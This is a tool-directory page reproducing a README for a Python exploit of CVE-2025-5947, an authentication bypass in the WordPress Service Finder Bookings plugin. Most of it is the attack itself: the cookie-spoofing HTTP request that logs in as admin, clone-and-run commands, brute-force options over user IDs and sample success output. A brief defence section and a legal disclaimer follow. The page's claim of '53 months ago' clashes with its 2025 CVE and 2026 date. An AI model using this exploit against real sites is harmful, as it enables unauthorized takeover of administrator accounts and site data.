Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 エクスプロイト | Kitploit
ツール/GitHubGitHub/xxconi/cve-2025-5947
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 エクスプロイト

リポジトリを見る
53ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 エクスプロイト

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

WordPress Service Finder Bookings ≤ 6.0 プラグインの認証バイパス脆弱性に対するエクスプロイトツール

📋 目次

  • 脆弱性について
  • 技術詳細
  • インストール
  • 使用方法
  • 例
  • 結果
  • セキュリティ
  • リソース

🔴 脆弱性について

CVE-2025-5947

Service Finder Bookings WordPress プラグインのバージョン 6.0 以前には、重大な認証バイパス脆弱性が存在します。

🎯 影響

認証されていない攻撃者は、以下を実行できます:

  • ✅ 任意のユーザーとしてログインできる
  • ✅ 管理者アカウントにアクセスできる
  • ✅ システムを完全に制御できる
  • ✅ データを漏えいさせることができる
  • ✅ 悪意のあるコードをアップロードできる

🔍 技術詳細

脆弱性の原因

service_finder_switch_back() 関数には不十分な Cookie 検証があります:

root@kitploit:~
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // Doğrulama yok!
}

攻撃ベクター

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

攻撃の特性:

  • 🌐 リモートアクセス (AV:N)
  • 🔓 認証不要 (PR:N)
  • 👤 ユーザー操作不要 (UI:N)
  • 📊 完全な影響 (C:H, I:H, A:H)

📦 インストール

必要条件

  • Python 3.6+
  • requests ライブラリ

ステップ 1: リポジトリをクローン

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

ステップ 2: 依存関係をインストール

root@kitploit:~
pip install -r requirements.txt

ステップ 3: 実行

root@kitploit:~
python exploit.py -u http://target.com

🚀 使用方法

基本コマンド

root@kitploit:~
# Yardım göster
python exploit.py -h

# Admin (ID=1) olarak giriş dene
python exploit.py -u http://target.com

# Belirli kullanıcı ID'si ile
python exploit.py -u http://target.com -i 5

# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# SSL doğrulaması olmadan
python exploit.py -u http://target.com --no-ssl-verify

# Özel timeout ile
python exploit.py -u http://target.com -t 30

パラメータ

💡 例

例 1: 基本エクスプロイト

root@kitploit:~
python exploit.py -u http://wordpress.local

出力:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu

🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/

例 2: ブルートフォース

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

出力:

root@kitploit:~
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]

例 3: HTTPS で SSL 検証なし

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 結果

エクスプロイトが成功した場合、以下の指標が含まれます:

✅ HTTP 301 または 302 レスポンスコード
✅ Location ヘッダーに /wp-admin/ が含まれる
✅ Set-Cookie ヘッダーに wordpress_logged_in_ が含まれる

🛡️ セキュリティ

⚠️ 法的免責事項

このツールは以下の目的にのみ使用してください:

  • ✅ 許可されたセキュリティテスト
  • ✅ 自身のシステムに対して
  • ✅ 書面による許可を得た場合

使用する必要があります。作者は一切の責任を負いません。

🔐 防御策

  1. 緊急アップデート

    root@kitploit:~
    # WordPress admin panelinden güncelle
    # veya WP-CLI ile
    wp plugin update sf-booking
    
  2. プラグインを無効化

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. プラグインを削除

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. Web Application Firewall (WAF)

    root@kitploit:~
    Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. セキュリティチェック

    • 管理者アカウントを確認する
    • アクセスログを調査する
    • 不正アクセスを調査する

📚 リソース

  • Patchstack データベース
  • GitHub Advisory
  • NVD 詳細
  • オリジナルエクスプロイト
  • CVSS Calculator

🤝 貢献

バグの報告や改善の提案を行うには:

  1. Fork する
  2. フィーチャーブランチを作成する (git checkout -b feature/improvement)
  3. コミットする (git commit -am 'Add improvement')
  4. プッシュする (git push origin feature/improvement)
  5. Pull Request を作成する

📄 ライセンス

MIT License - 詳細は LICENSE ファイルを参照してください

👤 著者

セキュリティリサーチャー

  • GitHub: @yourusername

🙏 謝辞

  • Patchstack Security Team
  • WordPress Security Community
  • CVE Coordinators

⭐ 役に立ったと思ったら、スターを付けてください!

🔝 先頭へ戻る

ツールをダウンロード
項目値
CVE IDCVE-2025-5947
プラグインService Finder Bookings (sf-booking)
影響を受けるバージョン≤ 6.0
深刻度🔴 CRITICAL
CVSS スコア9.8
CWECWE-639 (Authorization Bypass)
EPSS スコア0.617 (98.357 パーセンタイル)
公開日2025
パラメータ省略形説明デフォルト
--url-u対象 URL (必須)-
--user-id-iユーザー ID1
--brute-force-bブルートフォース範囲 (1-10)-
--no-ssl-verify-SSL 検証を無効化False
--timeout-tリクエストのタイムアウト (秒)10